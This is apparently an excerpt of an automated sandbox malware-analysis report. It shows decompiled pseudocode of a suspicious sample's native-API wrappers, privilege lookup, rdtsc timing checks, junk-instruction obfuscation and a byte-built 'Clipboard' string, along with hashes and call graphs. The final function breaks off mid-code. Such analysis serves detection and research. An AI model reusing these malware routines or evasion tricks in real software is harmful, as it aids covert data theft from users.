              				_t23 = NtCreateFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44); // executed
              				return _t23;
              			}







              APIs
              • NtCreateFile.NTDLL(00000060,00409103,?,004157F7,00409103,FFFFFFFF,?,?,FFFFFFFF,00409103,004157F7,?,00409103,00000060,00000000,00000000), ref: 0041A35D
              Memory Dump Source
              • Source File: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_ronkhfyq.jbxd
              Yara matches
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: 1b0bd2e8079d7939140556f8ae2cccb929dca85db97a20e1c5a5149061a2b3bc
              • Instruction ID: 24359d01ba3b756db5b113e6b13360880a0a9df5b3c4029a8eda21933aac747e
              • Opcode Fuzzy Hash: 1b0bd2e8079d7939140556f8ae2cccb929dca85db97a20e1c5a5149061a2b3bc
              • Instruction Fuzzy Hash: 6101AFB6201508AFCB58CF99DC85EEB77A9EF8C754F118258BA0DD7241C630E855CBA4
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 288 41a310-41a326 289 41a32c-41a361 NtCreateFile 288->289 290 41a327 call 41af60 288->290 290->289
              C-Code - Quality: 100%
              			E0041A310(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
              				long _t21;
              
              				_t3 = _a4 + 0xc5c; // 0xc5c
              				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
              				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
              				return _t21;
              			}





              APIs
              • NtCreateFile.NTDLL(00000060,00409103,?,004157F7,00409103,FFFFFFFF,?,?,FFFFFFFF,00409103,004157F7,?,00409103,00000060,00000000,00000000), ref: 0041A35D
              Memory Dump Source
              • Source File: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_ronkhfyq.jbxd
              Yara matches
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: ede47e358c6f592494742841678bda465d8b9d6efb767baf41057bbc73943ae4
              • Instruction ID: 22a17d5a8ca0ee81e299f457139f331d0ae15f1ba5b0ed3d189dcc3aa1234c62
              • Opcode Fuzzy Hash: ede47e358c6f592494742841678bda465d8b9d6efb767baf41057bbc73943ae4
              • Instruction Fuzzy Hash: 9CF06DB6215208AFCB48DF89DC85EEB77ADAF8C754F158248BA0D97241D630F8518BA4
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 291 41a4ea-41a52d call 41af60 NtAllocateVirtualMemory
              C-Code - Quality: 68%
              			E0041A4EA(void* __ecx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
              				long _t16;
              				signed int _t30;
              
              				asm("stc");
              				asm("stc");
              				 *(__ecx - 0x74aa5b16) =  *(__ecx - 0x74aa5b16) & _t30;
              				_t12 = _a4;
              				_t5 = _t12 + 0xc7c; // 0x3c7c
              				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _t12, _t5,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
              				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
              				return _t16;
              			}






              APIs
              • NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041B19D,?,0041B19D,?,00000000,?,00003000,00000040,00409103,00000000), ref: 0041A529
              Memory Dump Source
              • Source File: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_ronkhfyq.jbxd
              Yara matches
              Similarity
              • API ID: AllocateMemoryVirtual
              • String ID:
              • API String ID: 2167126740-0
              • Opcode ID: 36b501dc3894cc984797b1e69cf50bb0c9ea7290d1c0289243be7655b3b9efa6
              • Instruction ID: 109ee34d3ff9456264eec04b043a8d4e8155308b6a1c2191eb1202ba25fb2190
              • Opcode Fuzzy Hash: 36b501dc3894cc984797b1e69cf50bb0c9ea7290d1c0289243be7655b3b9efa6
              • Instruction Fuzzy Hash: 56F0F8B2210109AFDB14DF99DC85EE77BA9EF8C354F118159FA0C97241C631E911CBA4
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 294 41a4f0-41a506 295 41a50c-41a52d NtAllocateVirtualMemory 294->295 296 41a507 call 41af60 294->296 296->295
              C-Code - Quality: 100%
              			E0041A4F0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
              				long _t14;
              
              				_t3 = _a4 + 0xc7c; // 0x3c7c
              				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _t10, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
              				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
              				return _t14;
              			}





              APIs
              • NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041B19D,?,0041B19D,?,00000000,?,00003000,00000040,00409103,00000000), ref: 0041A529
              Memory Dump Source
              • Source File: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_ronkhfyq.jbxd
              Yara matches
              Similarity
              • API ID: AllocateMemoryVirtual
              • String ID:
              • API String ID: 2167126740-0
              • Opcode ID: 3937d7bcd71450592b7c43b4c62eb3862b139fe450dcdc5e45fc7760e87cf521
              • Instruction ID: 0f6e90ac6ad316f0230f9505ffb1913ba8f116b783957ff2d7da3ee6bc7086c1
              • Opcode Fuzzy Hash: 3937d7bcd71450592b7c43b4c62eb3862b139fe450dcdc5e45fc7760e87cf521
              • Instruction Fuzzy Hash: 53F0F2B2210208ABDB14DF89DC81EAB77ADAF8C654F118109BA0897241C630E8118BA4
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 68%
              			E0041A43A(void* __edx, intOrPtr _a6, void* _a10) {
              				long _t8;
              
              				asm("repne pop ecx");
              				_push(_t17);
              				_t5 = _a6;
              				_t2 = _t5 + 0x14; // 0x56c29f0f
              				_t3 = _t5 + 0xc6c; // 0x409d6f
              				E0041AF60( *_t2, _a6, _t3,  *_t2, 0, 0x2c);
              				_t8 = NtClose(_a10); // executed
              				return _t8;
              			}





              APIs
              • NtClose.NTDLL(00415990,?,?,00415990,00409103,FFFFFFFF), ref: 0041A465
              Memory Dump Source
              • Source File: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_ronkhfyq.jbxd
              Yara matches
              Similarity
              • API ID: Close
              • String ID:
              • API String ID: 3535843008-0
              • Opcode ID: 07d3615e569112840bfe7dd77fc094030ad989f6c3310b4ed0bc81daf31d026e
              • Instruction ID: 8ff0d7f8c4ded86d2cb5c71ed39f3bb509a75d1910e10b9b06dc07b0e4a5616b
              • Opcode Fuzzy Hash: 07d3615e569112840bfe7dd77fc094030ad989f6c3310b4ed0bc81daf31d026e
              • Instruction Fuzzy Hash: 63E08C72204204ABD610EF94DCC6ED77BA8DF48624F248096FA085B242D535E50086E0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E0041A440(intOrPtr _a4, void* _a8) {
              				long _t8;
              
              				_t5 = _a4;
              				_t2 = _t5 + 0x14; // 0x56c29f0f
              				_t3 = _t5 + 0xc6c; // 0x409d6f
              				E0041AF60( *_t2, _a4, _t3,  *_t2, 0, 0x2c);
              				_t8 = NtClose(_a8); // executed
              				return _t8;
              			}





              APIs
              • NtClose.NTDLL(00415990,?,?,00415990,00409103,FFFFFFFF), ref: 0041A465
              Memory Dump Source
              • Source File: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_ronkhfyq.jbxd
              Yara matches
              Similarity
              • API ID: Close
              • String ID:
              • API String ID: 3535843008-0
              • Opcode ID: 829c97b90c121aadc2fe6170b15f633a5be8987cb5c0fe9b9f6c1e719d211015
              • Instruction ID: 647376dfd9c4a3ead1cf8bf61973886ae708b244be9dddf4ec43f9330a142b27
              • Opcode Fuzzy Hash: 829c97b90c121aadc2fe6170b15f633a5be8987cb5c0fe9b9f6c1e719d211015
              • Instruction Fuzzy Hash: 96D01772200218ABD620EB99DC89ED77BACDF48A64F118055BA4C5B242C530FA1086E1
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 54%
              			E00408EC0(intOrPtr* _a4) {
              				intOrPtr _v8;
              				char _v24;
              				char _v284;
              				char _v804;
              				char _v840;
              				void* _t24;
              				void* _t31;
              				void* _t33;
              				void* _t34;
              				void* _t39;
              				void* _t50;
              				intOrPtr* _t52;
              				void* _t53;
              				void* _t54;
              				void* _t55;
              				void* _t56;
              
              				_t52 = _a4;
              				_t39 = 0; // executed
              				_t24 = E00407210(_t52,  &_v24); // executed
              				_t54 = _t53 + 8;
              				if(_t24 != 0) {
              					E00407420( &_v24,  &_v840);
              					_t55 = _t54 + 8;
              					do {
              						E0041BF30( &_v284, 0x104);
              						E0041C5A0( &_v284,  &_v804);
              						_t56 = _t55 + 0x10;
              						_t50 = 0x4f;
              						while(1) {
              							_push( &_v284);
              							_push(E004159D0(_t52, _t50));
              							_t31 = E00415A30();
              							_t56 = _t56 + 0x10;
              							if(_t31 != 0) {
              								break;
              							}
              							_t50 = _t50 + 1;
              							if(_t50 <= 0x62) {
              								continue;
              							} else {
              							}
              							goto L8;
              						}
              						_t9 = _t52 + 0x18; // 0x5e14c483
              						 *(_t52 + 0x478) =  *(_t52 + 0x478) ^  *_t9;
              						_t39 = 1;
              						L8:
              						_t33 = E00407450( &_v24,  &_v840);
              						_t55 = _t56 + 8;
              					} while (_t33 != 0 && _t39 == 0);
              					_t34 = E004074D0(_t52,  &_v24); // executed
              					if(_t39 == 0) {
              						asm("rdtsc");
              						asm("rdtsc");
              						_v8 = _t34 - 0 + _t34;
              						 *((intOrPtr*)(_t52 + 0x560)) =  *((intOrPtr*)(_t52 + 0x560)) + 0xffffffba;
              					}
              					 *((intOrPtr*)(_t52 + 0x35)) =  *((intOrPtr*)(_t52 + 0x35)) + _t39;
              					_t20 = _t52 + 0x35; // 0xffff43e8
              					 *((intOrPtr*)(_t52 + 0x36)) =  *((intOrPtr*)(_t52 + 0x36)) +  *_t20 + 1;
              					return 1;
              				} else {
              					return _t24;
              				}
              			}




















              Memory Dump Source
              • Source File: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_ronkhfyq.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 93f760812399f8b802e89b1baefd5a0ad2d7afa31538cab3fdcf1f6430cb223a
              • Instruction ID: e1e303cda2bc467be42d69ec047be5a8586c693d5030c6259e94ade7c470e7be
              • Opcode Fuzzy Hash: 93f760812399f8b802e89b1baefd5a0ad2d7afa31538cab3fdcf1f6430cb223a
              • Instruction Fuzzy Hash: 45213CB2C4020957CB20D6709D41AFB73ACAF54314F44057FF989A3181FA38BB4587A6
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              control_flow_graph 8 41a5e0-41a611 call 41af60 RtlAllocateHeap
              C-Code - Quality: 53%
              			E0041A5E0(intOrPtr _a4, void* _a16) {
              				void* _v3;
              				long _t6;
              				void* _t7;
              				void* _t8;
              				long _t12;
              
              				_t5 = _a4;
              				_t8 =  *(_a4 + 0x14);
              				_t6 = E0041AF60(_t8, _t5, _t5 + 0xc8c, _t8, 0, 0x34);
              				asm("adc al, 0x8b");
              				asm("adc [ebx-0x3b7cf3b3], cl");
              				asm("adc al, 0x52");
              				_t7 = RtlAllocateHeap(_t8, _t6, _t12); // executed
              				return _t7;
              			}

              APIs
              • RtlAllocateHeap.NTDLL(vQA,?,XA,004158EF,?,00415176,?,?,?,?,?,00000000,00409103,?), ref: 0041A60D
              Similarity
              • API ID: AllocateHeap
              • String ID: vQA$XA
              • API String ID: 1279760036-3554124191
              • Opcode ID: 8082421df8bc89d162f2638fa4c1385792dc10d17e44cb2d46fb0fb817fbd62f
              • Instruction ID: 5112eb7d04df1d6e50f339e712a9d98793db7acbdec2b9c88685dfce6d12f60e
              • Opcode Fuzzy Hash: 8082421df8bc89d162f2638fa4c1385792dc10d17e44cb2d46fb0fb817fbd62f
              • Instruction Fuzzy Hash: 0EE01AB12002086BDB14DF49DC45E9737ACEF88654F118155BA085B241C530F9108AB5
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              control_flow_graph 15 41a612-41a613 16 41a615-41a617 15->16 17 41a5fd-41a611 RtlAllocateHeap 15->17 18 41a689-41a68c 16->18 19 41a619-41a61b 16->19 19->18
              C-Code - Quality: 50%
              			E0041A612(void* __eax, void* __eflags, void* _a1, char _a4, void* _a8, long _a12, void* _a16) {
              				void* __esi;
              				void* __ebp;
              				long _t9;
              				void* _t10;
              				void* _t11;
              				long _t15;
              				long _t18;
              
              				_t9 = _t18;
              				if(__eflags > 0) {
              					asm("adc al, 0x8b");
              					asm("adc [ebx-0x3b7cf3b3], cl");
              					asm("adc al, 0x52");
              					_t10 = RtlAllocateHeap(_t11, _t9, _t15); // executed
              					return _t10;
              				} else {
              					_push(ds);
              					if(__eflags >= 0) {
              						asm("rcr byte [esi+0x5d], 1"); // executed
              						_pop(__esi);
              						_pop(__ebp);
              						return __eax;
              					} else {
              						asm("cdq");
              						asm("out dx, eax");
              						__ebp = __esp;
              						asm("in al, dx");
              						__eax = _a4;
              						_t4 = __eax + 0xc90; // 0xc90
              						__esi = _t4;
              						__eax = _a12;
              						__eax = RtlFreeHeap(_a8, _a12, _a16); // executed
              						__esi = __esi;
              						__ebp = __ebp;
              						return __eax;
              					}
              				}
              			}

              APIs
              • RtlAllocateHeap.NTDLL(vQA,?,XA,004158EF,?,00415176,?,?,?,?,?,00000000,00409103,?), ref: 0041A60D
              Similarity
              • API ID: AllocateHeap
              • String ID: vQA
              • API String ID: 1279760036-222744803
              • Opcode ID: 25390f91c17b98b234e1ab0be807ce0d70dbf3980185bf3fbe2545db36cdc728
              • Instruction ID: e5e3093a980432026f87045ee9294afd0da951fb93029d0fb8ee1138940f66d1
              • Opcode Fuzzy Hash: 25390f91c17b98b234e1ab0be807ce0d70dbf3980185bf3fbe2545db36cdc728
              • Instruction Fuzzy Hash: F8D0957F0092522AF712F3A05D808F3370DE5C625C32C4C87D4C94B049C415408943A5
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              control_flow_graph 215 41a7f1-41a7f6 216 41a7b6-41a7d9 215->216 217 41a7f8 215->217 218 41a7df-41a7f0 216->218 219 41a7da call 41af60 216->219 220 41a7fa-41a814 217->220 221 41a79c-41a7b4 LookupPrivilegeValueW 217->221 219->218 222 41a81a-41a827 220->222 223 41a815 call 41b030 220->223 223->222
              APIs
              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040D5B2,0040D5B2,00000041,00000000,?,00409175), ref: 0041A7B0
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: 04996b27cc3a8e28686fee7ffa7528340dfc9e4ad8ad515d80635477a9edbc4e
              • Instruction ID: d801fb6e8e135d1f7297e75111a5b6a1c80427030879cfd859f3471cb81f6c57
              • Opcode Fuzzy Hash: 04996b27cc3a8e28686fee7ffa7528340dfc9e4ad8ad515d80635477a9edbc4e
              • Instruction Fuzzy Hash: FA11E3B5200204AFCB14EFA8CC85EE77B68DF48360F04814AF91D97342C234E910C7A1
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              control_flow_graph 226 41a772-41a777 227 41a704-41a709 226->227 228 41a779-41a77f 226->228 229 41a70f-41a724 227->229 230 41a70a call 41af60 227->230 231 41a781-41a79a call 41af60 228->231 232 41a7d6-41a7f0 call 41af60 228->232 230->229 236 41a79f-41a7b4 LookupPrivilegeValueW 231->236
              APIs
              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040D5B2,0040D5B2,00000041,00000000,?,00409175), ref: 0041A7B0
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: bb97520cd0521ec4fdbbdc8def6d758f712b5e6667911d8f6daa84a07f1d742b
              • Instruction ID: 9c28b7cc7472d034cae90b7970fce93ca26411468d97baa0e424f7f395dba4d2
              • Opcode Fuzzy Hash: bb97520cd0521ec4fdbbdc8def6d758f712b5e6667911d8f6daa84a07f1d742b
              • Instruction Fuzzy Hash: BE01ADB52012086FCB10EFA9DC45DE737A9EF88328F14855AFD4D87242D535E921CBB2
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              control_flow_graph 240 407678-4076ca call 41bf80 call 41cb60 call 40a130 call 415a90 249 4076cc-4076de PostThreadMessageW 240->249 250 4076fe-407702 240->250 251 4076e0-4076fa call 409890 249->251 252 4076fd 249->252 251->252 252->250
              C-Code - Quality: 65%
              			E00407678(void* __eax, intOrPtr* __ecx, void* __edx, long _a8) {
              				char _v63;
              				char _v64;
              				void* _t14;
              				int _t15;
              				long _t24;
              				int _t29;
              				void* _t32;
              				void* _t34;
              				intOrPtr _t39;
              
              				asm("cli");
              				 *__ecx =  *__ecx + __edx;
              				_t39 =  *__ecx;
              				_pop(es);
              				_push(0x83ec8b55);
              				_t32 = _t34;
              				_t1 =  &_v63; // 0x83ec8b16
              				_v64 = 0;
              				E0041BF80(_t1, 0, 0x3f);
              				_t3 =  &_v64; // 0x83ec8b15
              				E0041CB60(_t3, 3);
              				_t5 =  &_v64; // 0x83ec8b15
              				_t14 = E0040A130(_t39, _a8 + 0x20, _t5); // executed
              				_t15 = E00415A90(_a8 + 0x20, _t14, 0, 0, 0xc4e7b6d6);
              				_t29 = _t15;
              				if(_t29 != 0) {
              					_t24 = _a8;
              					_t15 = PostThreadMessageW(_t24, 0x111, 0, 0); // executed
              					_t41 = _t15;
              					if(_t15 == 0) {
              						_t8 = (E00409890(_t41, 1, 8) & 0x000000ff) - 0x40; // 0x83ec8b15
              						_t15 =  *_t29(_t24, 0x8003, _t32 + _t8, _t15);
              					}
              				}
              				return _t15;
              			}

              APIs
              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004076DA
              Similarity
              • API ID: MessagePostThread
              • String ID:
              • API String ID: 1836367815-0
              • Opcode ID: 1d24450bd017678ce66bab97c7d6d8ebfdde9aab029e39b938909c969a5b9744
              • Instruction ID: e382de2d488913a4c38b773f9f4ea01094326f9544b34bd5420c5db10e548f36
              • Opcode Fuzzy Hash: 1d24450bd017678ce66bab97c7d6d8ebfdde9aab029e39b938909c969a5b9744
              • Instruction Fuzzy Hash: 40012832A802297AE721A6919C43FFE775C9F05F55F04052AFB04FA1C1D6A9390647E9
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              control_flow_graph 255 407680-40768f 256 407698-4076ca call 41cb60 call 40a130 call 415a90 255->256 257 407693 call 41bf80 255->257 264 4076cc-4076de PostThreadMessageW 256->264 265 4076fe-407702 256->265 257->256 266 4076e0-4076fa call 409890 264->266 267 4076fd 264->267 266->267 267->265
              C-Code - Quality: 82%
              			E00407680(void* __eflags, intOrPtr _a4, long _a8) {
              				char _v67;
              				char _v68;
              				void* _t12;
              				intOrPtr* _t13;
              				int _t14;
              				long _t21;
              				intOrPtr* _t25;
              				void* _t26;
              				void* _t30;
              
              				_t30 = __eflags;
              				_t1 =  &_v67; // 0x83ec8b16
              				_v68 = 0;
              				E0041BF80(_t1, 0, 0x3f);
              				_t3 =  &_v68; // 0x83ec8b15
              				E0041CB60(_t3, 3);
              				_t5 =  &_v68; // 0x83ec8b15
              				_t12 = E0040A130(_t30, _a4 + 0x20, _t5); // executed
              				_t13 = E00415A90(_a4 + 0x20, _t12, 0, 0, 0xc4e7b6d6);
              				_t25 = _t13;
              				if(_t25 != 0) {
              					_t21 = _a8;
              					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
              					_t32 = _t14;
              					if(_t14 == 0) {
              						_t8 = (E00409890(_t32, 1, 8) & 0x000000ff) - 0x40; // 0x83ec8b15
              						_t14 =  *_t25(_t21, 0x8003, _t26 + _t8, _t14);
              					}
              					return _t14;
              				}
              				return _t13;
              			}

              APIs
              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004076DA
              Similarity
              • API ID: MessagePostThread
              • String ID:
              • API String ID: 1836367815-0
              • Opcode ID: b252e7fb5a3fa841a4463d49c9e96754b684922344a3da95cd15ab6fad1711e5
              • Instruction ID: 278e8058fb31caf7c2e07854df6c2d6cb8d26bb135801241625d4459e23f34b3
              • Opcode Fuzzy Hash: b252e7fb5a3fa841a4463d49c9e96754b684922344a3da95cd15ab6fad1711e5
              • Instruction Fuzzy Hash: 6401D431A8022876E720A6959C43FFE776C9B04B54F04012AFB04BA1C1EAA8790646EE
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 79%
              			E0041A620(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
              				char _t10;
              
              				asm("in al, dx");
              				_t7 = _a4;
              				_t3 = _t7 + 0xc90; // 0xc90
              				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
              				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
              				return _t10;
              			}

              APIs
              • RtlFreeHeap.NTDLL(00000060,00409103,?,?,00409103,00000060,00000000,00000000,?,?,00409103,?,00000000), ref: 0041A64D
              Similarity
              • API ID: FreeHeap
              • String ID:
              • API String ID: 3298025750-0
              • Opcode ID: a6e6f41d857b18798f6d11579541f16a6a166f54801e0754a839ad98261f1417
              • Instruction ID: e76337afa916636dc7999d0b0cc11d2e66c0cc36247d0f50dc268ede5031f4cd
              • Opcode Fuzzy Hash: a6e6f41d857b18798f6d11579541f16a6a166f54801e0754a839ad98261f1417
              • Instruction Fuzzy Hash: 14E012B1200208ABDB14EF89DC49EA737ACEF88764F118159BA085B242C630E9208AB1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040D5B2,0040D5B2,00000041,00000000,?,00409175), ref: 0041A7B0
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: b6c9d2bb7c1b66bb05113664278c8ba5e33a8a1c89f8aae2c7e428828915c1da
              • Instruction ID: f191f6caa62469aa0aeb0b25a98ea8bb3e9aa7cd5fa1fede7adac256a7a22315
              • Opcode Fuzzy Hash: b6c9d2bb7c1b66bb05113664278c8ba5e33a8a1c89f8aae2c7e428828915c1da
              • Instruction Fuzzy Hash: 4EE01AB12002086BDB10DF49CC45EE737ADEF89664F118155BA0C57241C530E8158AB5
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 79%
              			E0041A622() {
              				char _t10;
              				void* _t18;
              
              				asm("in al, dx");
              				_t7 =  *((intOrPtr*)(_t18 + 8));
              				_t3 = _t7 + 0xc90; // 0xc90
              				E0041AF60( *((intOrPtr*)( *((intOrPtr*)(_t18 + 8)) + 0x14)), _t7, _t3,  *((intOrPtr*)( *((intOrPtr*)(_t18 + 8)) + 0x14)), 0, 0x35);
              				_t10 = RtlFreeHeap( *(_t18 + 0xc),  *(_t18 + 0x10),  *(_t18 + 0x14)); // executed
              				return _t10;
              			}

              APIs
              • RtlFreeHeap.NTDLL(00000060,00409103,?,?,00409103,00000060,00000000,00000000,?,?,00409103,?,00000000), ref: 0041A64D
              Similarity
              • API ID: FreeHeap
              • String ID:
              • API String ID: 3298025750-0
              • Opcode ID: 42c06c799e4df52455392ddeb8f0d161d1629164c4721ba82391d5d6f37b3dae
              • Instruction ID: 9b0d6052ef7d2a57c5749feae5536bac713de6889547fe143f190e0c4f2b478e
              • Opcode Fuzzy Hash: 42c06c799e4df52455392ddeb8f0d161d1629164c4721ba82391d5d6f37b3dae
              • Instruction Fuzzy Hash: FDE046B1200204AFDB14DF59DC48EE73B68EF88364F118159F90C9B241C630E921CAB0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 54%
              			E0041A654(void* __eax, signed int __ebx, void* __ecx, void* __edx, int _a4) {
              				intOrPtr _v0;
              				intOrPtr _t10;
              				intOrPtr* _t19;
              
              				_push(0xffffffd9);
              				asm("lodsb");
              				 *0xe20defeb =  *0xe20defeb ^ __ebx;
              				asm("les edx, [ebp-0x75]");
              				_t8 = _v0;
              				_t19 = _v0 + 0xc98;
              				E0041AF60( *((intOrPtr*)(_t8 + 0xa18)), _t8, _t19,  *((intOrPtr*)(_t8 + 0xa18)), 0, 0x36);
              				_t10 =  *_t19;
              				ExitProcess(_a4);
              				asm("rcr byte [esi+0x5d], 1"); // executed
              				return _t10;
              			}

              APIs
              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A688
              Similarity
              • API ID: ExitProcess
              • String ID:
              • API String ID: 621844428-0
              • Opcode ID: ed9718ef2cbb54db8ab7e332bc441fe251272e78161c55fbd11ed651f822c4db
              • Instruction ID: dee541f4d3dd545f110619b51694c466bdef55d7f7e62b80beb5638e05ceca3b
              • Opcode Fuzzy Hash: ed9718ef2cbb54db8ab7e332bc441fe251272e78161c55fbd11ed651f822c4db
              • Instruction Fuzzy Hash: 44E04F716411146BC724DF69CC85ECB3B68EF457A0F14C668B919AF282C530AA06C7D1
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 82%
              			E0041A660(intOrPtr _a4, int _a8) {
              				intOrPtr _t7;
              				intOrPtr* _t10;
              
              				_t5 = _a4;
              				_t10 = _a4 + 0xc98;
              				E0041AF60( *((intOrPtr*)(_t5 + 0xa18)), _t5, _t10,  *((intOrPtr*)(_t5 + 0xa18)), 0, 0x36);
              				_t7 =  *_t10;
              				ExitProcess(_a8);
              				asm("rcr byte [esi+0x5d], 1"); // executed
              				return _t7;
              			}

              APIs
              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A688
              Similarity
              • API ID: ExitProcess
              • String ID:
              • API String ID: 621844428-0
              • Opcode ID: 1cfc6acf09b4d581fed35e39f5b9fca2d0b24bba4d46bbacac3375e597e63901
              • Instruction ID: 43fab5bc382f8dbf035fa71370f402dcb25f1a4f198c16d6a3d81994ba933d62
              • Opcode Fuzzy Hash: 1cfc6acf09b4d581fed35e39f5b9fca2d0b24bba4d46bbacac3375e597e63901
              • Instruction Fuzzy Hash: 70D017726002187BD620EB99CC89FD777ACDF49BA4F1580A5BA0C6B242C934BA5187E1
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 24%
              			E00406EA4(intOrPtr* __eax, void* __ecx, void* __edx, void* __eflags) {
              				short _t40;
              				void* _t61;
              				void* _t83;
              				void* _t86;
              				void* _t87;
              				void* _t90;
              				void* _t91;
              				void* _t93;
              
              				asm("invalid");
              				asm("rcl dword [ebp+ebp*4+0x210aaff4], cl");
              				asm("int 0x42");
              				asm("int3");
              				if(__eflags <= 0) {
              					_t87 = _t86 + 1;
              					 *__eax =  *__eax + __eax;
              					_t5 = _t61 + 0x57;
              					 *_t5 =  *((intOrPtr*)(_t61 + 0x57)) + __edx;
              					__eflags =  *_t5;
              					_push(_t61);
              					_t79 = __eax + __eax;
              					_t62 = __ecx + 0x1ff570;
              					_t40 = E0041C210( *((intOrPtr*)(_t87 + 0xc)), __ecx + 0x1ff570, __eax + __eax);
              					_t91 = _t90 + 0xc;
              					__eflags = _t40;
              					if(_t40 == 0) {
              						E0041BF00(_t62,  *((intOrPtr*)(_t87 + 0xc)), _t79);
              						_t93 = _t91 + 0xc;
              						 *((short*)(_t87 - 4)) = 0;
              						_t64 = _t83 + 0x447c;
              						 *((intOrPtr*)(_t87 - 0xc)) = 0xa000d;
              						 *((intOrPtr*)(_t87 - 8)) = 0xa000d;
              						 *((intOrPtr*)(_t87 - 0x3c)) = 0x6c0043;
              						 *((intOrPtr*)(_t87 - 0x38)) = 0x700069;
              						 *((intOrPtr*)(_t87 - 0x34)) = 0x6f0062;
              						 *((intOrPtr*)(_t87 - 0x30)) = 0x720061;
              						 *((intOrPtr*)(_t87 - 0x2c)) = 0x64;
              						 *((short*)(_t87 - 0x28)) = 0;
              						 *((intOrPtr*)(_t87 - 0x26)) = 0;
              						 *((intOrPtr*)(_t87 - 0x22)) = 0;
              						 *((short*)(_t87 - 0x1e)) = 0;
              						 *((intOrPtr*)( *((intOrPtr*)(_t83 + 0xcdc))))(_t83 + 0x447c, 0x104);
              						 *((intOrPtr*)( *((intOrPtr*)(_t83 + 0xcd8))))(0);
              						__eflags = 0 - 0x40;
              						if(0 <= 0x40) {
              							__eflags = 0;
              							if(0 == 0) {
              								 *((intOrPtr*)(_t87 - 0x1c)) = 0x6e0055;
